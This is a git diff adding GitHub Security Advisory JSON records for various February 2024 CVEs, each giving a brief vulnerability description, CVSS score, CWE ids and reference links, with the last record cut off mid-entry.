--git a/advisories/unreviewed/2024/02/GHSA-p56v-8px4-hjvv/GHSA-p56v-8px4-hjvv.json b/advisories/unreviewed/2024/02/GHSA-p56v-8px4-hjvv/GHSA-p56v-8px4-hjvv.json new file mode 100644 index 0000000000000..e60438cb682a6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p56v-8px4-hjvv/GHSA-p56v-8px4-hjvv.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p56v-8px4-hjvv", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-46159" + ], + "details": "IBM Storage Ceph 5.3z1, 5.3z5, and 6.1z1 could allow an authenticated user on the network to cause a denial of service from RGW. IBM X-Force ID: 268906.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46159" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/268906" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7112263" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T03:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p6wv-4394-73p5/GHSA-p6wv-4394-73p5.json b/advisories/unreviewed/2024/02/GHSA-p6wv-4394-73p5/GHSA-p6wv-4394-73p5.json new file mode 100644 index 0000000000000..6a792c1e96cb3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p6wv-4394-73p5/GHSA-p6wv-4394-73p5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p6wv-4394-73p5", + "modified": "2024-02-07T06:35:21Z", + "published": "2024-02-07T06:35:21Z", + "aliases": [ + "CVE-2024-23447" + ], + "details": "An issue was discovered in the Windows Network Drive Connector when using Document Level Security to assign permissions to a file, with explicit allow write and deny read. Although the document is not accessible to the user in Network Drive it is visible in search applications to the user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23447" + }, + { + "type": "WEB", + "url": "https://discuss.elastic.co/t/elastic-network-drive-connector-8-12-1-security-update-esa-2024-02/352687" + }, + { + "type": "WEB", + "url": "https://www.elastic.co/community/security" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T04:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p72g-62xm-rq24/GHSA-p72g-62xm-rq24.json b/advisories/unreviewed/2024/02/GHSA-p72g-62xm-rq24/GHSA-p72g-62xm-rq24.json new file mode 100644 index 0000000000000..b075cb6a4d8e9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p72g-62xm-rq24/GHSA-p72g-62xm-rq24.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p72g-62xm-rq24", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2023-47167" + ], + "details": "A post authentication command injection vulnerability exists in the GRE policy functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47167" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1855" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p7q4-p756-4hjh/GHSA-p7q4-p756-4hjh.json b/advisories/unreviewed/2024/02/GHSA-p7q4-p756-4hjh/GHSA-p7q4-p756-4hjh.json new file mode 100644 index 0000000000000..882afb82bb3e4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p7q4-p756-4hjh/GHSA-p7q4-p756-4hjh.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p7q4-p756-4hjh", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T12:30:49Z", + "aliases": [ + "CVE-2024-24885" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lê Văn Toản Woocommerce Vietnam Checkout allows Stored XSS.This issue affects Woocommerce Vietnam Checkout: from n/a through 2.0.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24885" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/woo-vietnam-checkout/wordpress-woocommerce-vietnam-checkout-plugin-2-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T12:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p873-hg5h-j2mp/GHSA-p873-hg5h-j2mp.json b/advisories/unreviewed/2024/02/GHSA-p873-hg5h-j2mp/GHSA-p873-hg5h-j2mp.json new file mode 100644 index 0000000000000..23eb8a2020de9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p873-hg5h-j2mp/GHSA-p873-hg5h-j2mp.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p873-hg5h-j2mp", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T00:31:28Z", + "aliases": [ + "CVE-2024-22096" + ], + "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can append path traversal characters to the filename when using a specific command, allowing them to read arbitrary files from the system.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22096" + }, + { + "type": "WEB", + "url": "https://rapidscada.org/contact/" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22", + "CWE-23" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T00:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p884-m725-55w6/GHSA-p884-m725-55w6.json b/advisories/unreviewed/2024/02/GHSA-p884-m725-55w6/GHSA-p884-m725-55w6.json new file mode 100644 index 0000000000000..295abb53dc1c0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p884-m725-55w6/GHSA-p884-m725-55w6.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p884-m725-55w6", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-02-06T00:30:25Z", + "aliases": [ + "CVE-2023-6557" + ], + "details": "The The Events Calendar plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.2.8.2 via the route function hooked into wp_ajax_nopriv_tribe_dropdown. This makes it possible for unauthenticated attackers to extract potentially sensitive data including post titles and IDs of pending, private and draft posts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6557" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3010104%40the-events-calendar%2Ftags%2F6.2.9&old=3010096%40the-events-calendar%2Ftags%2F6.2.9" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fc40196e-c0f3-4bc6-ac4b-b866902def61?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p8pq-6r4w-c75v/GHSA-p8pq-6r4w-c75v.json b/advisories/unreviewed/2024/02/GHSA-p8pq-6r4w-c75v/GHSA-p8pq-6r4w-c75v.json new file mode 100644 index 0000000000000..8fc428637de4c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p8pq-6r4w-c75v/GHSA-p8pq-6r4w-c75v.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p8pq-6r4w-c75v", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2024-0684" + ], + "details": "A flaw was found in the GNU coreutils \"split\" program. A heap overflow with user-controlled data of multiple hundred bytes in length could occur in the line_bytes_split() function, potentially leading to an application crash and denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0684" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-0684" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258948" + }, + { + "type": "WEB", + "url": "https://www.openwall.com/lists/oss-security/2024/01/18/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T09:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p8wr-r5ww-35j3/GHSA-p8wr-r5ww-35j3.json b/advisories/unreviewed/2024/02/GHSA-p8wr-r5ww-35j3/GHSA-p8wr-r5ww-35j3.json new file mode 100644 index 0000000000000..f3c6276233f3a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p8wr-r5ww-35j3/GHSA-p8wr-r5ww-35j3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p8wr-r5ww-35j3", + "modified": "2024-02-05T06:30:30Z", + "published": "2024-02-05T06:30:30Z", + "aliases": [ + "CVE-2023-5800" + ], + "details": "Vintage,\nmember of the AXIS OS Bug Bounty Program, has found that the VAPIX API create_overlay.cgi\ndid not have a sufficient input validation allowing for a possible remote code\nexecution. This flaw can only be exploited after authenticating with an\noperator- or administrator-privileged service account. Axis has released patched AXIS OS\nversions for the highlighted flaw. Please refer to the Axis security advisory\nfor more information and solution.\n\n\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5800" + }, + { + "type": "WEB", + "url": "https://www.axis.com/dam/public/89/d9/99/cve-2023-5800-en-US-424339.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p943-xf69-x33h/GHSA-p943-xf69-x33h.json b/advisories/unreviewed/2024/02/GHSA-p943-xf69-x33h/GHSA-p943-xf69-x33h.json new file mode 100644 index 0000000000000..507e075de4af1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p943-xf69-x33h/GHSA-p943-xf69-x33h.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p943-xf69-x33h", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-08T18:30:39Z", + "aliases": [ + "CVE-2023-50061" + ], + "details": "PrestaShop Op'art Easy Redirect >= 1.3.8 and <= 1.3.12 is vulnerable to SQL Injection via Oparteasyredirect::hookActionDispatcher().", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50061" + }, + { + "type": "WEB", + "url": "https://security.friendsofpresta.org/modules/2024/02/08/oparteasyredirect.html" + }, + { + "type": "WEB", + "url": "https://www.store-opart.fr/p/39-module-redirection-prestashop.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p947-jxh9-g736/GHSA-p947-jxh9-g736.json b/advisories/unreviewed/2024/02/GHSA-p947-jxh9-g736/GHSA-p947-jxh9-g736.json new file mode 100644 index 0000000000000..a15db66f34744 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p947-jxh9-g736/GHSA-p947-jxh9-g736.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p947-jxh9-g736", + "modified": "2024-02-08T21:30:34Z", + "published": "2024-02-01T09:30:18Z", + "aliases": [ + "CVE-2023-37621" + ], + "details": "An issue in Fronius Datalogger Web v.2.0.5-4, allows remote attackers to obtain sensitive information via a crafted request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37621" + }, + { + "type": "WEB", + "url": "https://github.com/MY0723/CNVD-2022-27366__CVE-2023-37621" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-668" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T09:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-p9xw-3r92-842f/GHSA-p9xw-3r92-842f.json b/advisories/unreviewed/2024/02/GHSA-p9xw-3r92-842f/GHSA-p9xw-3r92-842f.json new file mode 100644 index 0000000000000..413a650b362f6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-p9xw-3r92-842f/GHSA-p9xw-3r92-842f.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p9xw-3r92-842f", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24350" + ], + "details": "File Upload vulnerability in Software Publico e-Sic Livre v.2.0 and before allows a remote attacker to execute arbitrary code via the extension filtering component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24350" + }, + { + "type": "WEB", + "url": "https://gist.github.com/viniciuspinheiros/4e53b297fd6466cf12d01867ee1c9c33" + }, + { + "type": "WEB", + "url": "https://medium.com/%40viniciuspinheiros/e-sic-livre-2-0-authenticated-file-upload-leads-to-remote-code-execution-rce-5937c9537258" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T01:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pc53-x582-24xc/GHSA-pc53-x582-24xc.json b/advisories/unreviewed/2024/02/GHSA-pc53-x582-24xc/GHSA-pc53-x582-24xc.json new file mode 100644 index 0000000000000..43c0d3e984ef5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pc53-x582-24xc/GHSA-pc53-x582-24xc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pc53-x582-24xc", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20820" + ], + "details": "Improper input validation in bootloader prior to SMR Feb-2024 Release 1 allows attacker to cause an Out-Of-Bounds read.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20820" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pcmw-6hxc-hqmx/GHSA-pcmw-6hxc-hqmx.json b/advisories/unreviewed/2024/02/GHSA-pcmw-6hxc-hqmx/GHSA-pcmw-6hxc-hqmx.json new file mode 100644 index 0000000000000..69f177ed10670 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pcmw-6hxc-hqmx/GHSA-pcmw-6hxc-hqmx.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pcmw-6hxc-hqmx", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2024-22365" + ], + "details": "linux-pam (aka Linux PAM) before 1.6.0 allows attackers to cause a denial of service (blocked login process) via mkfifo because the openat call (for protect_dir) lacks O_DIRECTORY.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22365" + }, + { + "type": "WEB", + "url": "https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb" + }, + { + "type": "WEB", + "url": "https://github.com/linux-pam/linux-pam" + }, + { + "type": "WEB", + "url": "https://github.com/linux-pam/linux-pam/releases/tag/v1.6.0" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/18/3" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T08:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pf2p-5vvg-9vxj/GHSA-pf2p-5vvg-9vxj.json b/advisories/unreviewed/2024/02/GHSA-pf2p-5vvg-9vxj/GHSA-pf2p-5vvg-9vxj.json new file mode 100644 index 0000000000000..4c93aeb7821d3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pf2p-5vvg-9vxj/GHSA-pf2p-5vvg-9vxj.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pf2p-5vvg-9vxj", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-22519" + ], + "details": "An issue discovered in OpenDroneID OSM 3.5.1 allows attackers to impersonate other drones via transmission of crafted data packets.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22519" + }, + { + "type": "WEB", + "url": "https://github.com/Drone-Lab/opendroneid-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pf89-rhhw-xmhp/GHSA-pf89-rhhw-xmhp.json b/advisories/unreviewed/2024/02/GHSA-pf89-rhhw-xmhp/GHSA-pf89-rhhw-xmhp.json new file mode 100644 index 0000000000000..cf47d12c3a23a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pf89-rhhw-xmhp/GHSA-pf89-rhhw-xmhp.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pf89-rhhw-xmhp", + "modified": "2024-02-07T00:30:26Z", + "published": "2024-02-07T00:30:26Z", + "aliases": [ + "CVE-2024-1284" + ], + "details": "Use after free in Mojo in Google Chrome prior to 121.0.6167.160 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1284" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/41494539" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T00:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pg26-49x3-7h59/GHSA-pg26-49x3-7h59.json b/advisories/unreviewed/2024/02/GHSA-pg26-49x3-7h59/GHSA-pg26-49x3-7h59.json new file mode 100644 index 0000000000000..88d13e8dbb26d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pg26-49x3-7h59/GHSA-pg26-49x3-7h59.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pg26-49x3-7h59", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-43513" + ], + "details": "Memory corruption while processing the event ring, the context read pointer is untrusted to HLOS and when it is passed with arbitrary values, may point to address in the middle of ring element.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43513" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pg7w-g93j-pc6j/GHSA-pg7w-g93j-pc6j.json b/advisories/unreviewed/2024/02/GHSA-pg7w-g93j-pc6j/GHSA-pg7w-g93j-pc6j.json new file mode 100644 index 0000000000000..cd789d9e7d525 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pg7w-g93j-pc6j/GHSA-pg7w-g93j-pc6j.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pg7w-g93j-pc6j", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-39303" + ], + "details": "An improper authentication vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to compromise the security of the system via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.3.2578 build 20231110 and later\nQuTS hero h5.1.3.2578 build 20231110 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39303" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-33" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pg8c-mxmr-vcqr/GHSA-pg8c-mxmr-vcqr.json b/advisories/unreviewed/2024/02/GHSA-pg8c-mxmr-vcqr/GHSA-pg8c-mxmr-vcqr.json new file mode 100644 index 0000000000000..74364daf57c6e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pg8c-mxmr-vcqr/GHSA-pg8c-mxmr-vcqr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pg8c-mxmr-vcqr", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20828" + ], + "details": "Improper authorization verification vulnerability in Samsung Internet prior to version 24.0 allows physical attackers to access files downloaded in SecretMode without proper authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20828" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pgjx-2qxc-c47q/GHSA-pgjx-2qxc-c47q.json b/advisories/unreviewed/2024/02/GHSA-pgjx-2qxc-c47q/GHSA-pgjx-2qxc-c47q.json new file mode 100644 index 0000000000000..409e838a0c0f5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pgjx-2qxc-c47q/GHSA-pgjx-2qxc-c47q.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pgjx-2qxc-c47q", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0597" + ], + "details": "The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 12.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0597" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3023398/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pgq6-4q3w-7pvf/GHSA-pgq6-4q3w-7pvf.json b/advisories/unreviewed/2024/02/GHSA-pgq6-4q3w-7pvf/GHSA-pgq6-4q3w-7pvf.json new file mode 100644 index 0000000000000..e45f697592d1d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pgq6-4q3w-7pvf/GHSA-pgq6-4q3w-7pvf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pgq6-4q3w-7pvf", + "modified": "2024-02-07T18:30:26Z", + "published": "2024-02-02T00:31:25Z", + "aliases": [ + "CVE-2023-47256" + ], + "details": "ConnectWise ScreenConnect through 23.8.4 allows local users to connect to arbitrary relay servers via implicit trust of proxy settings", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47256" + }, + { + "type": "WEB", + "url": "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.8-security-fix" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-ph96-9c75-4297/GHSA-ph96-9c75-4297.json b/advisories/unreviewed/2024/02/GHSA-ph96-9c75-4297/GHSA-ph96-9c75-4297.json new file mode 100644 index 0000000000000..d6898a5658a01 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-ph96-9c75-4297/GHSA-ph96-9c75-4297.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ph96-9c75-4297", + "modified": "2024-02-02T12:30:30Z", 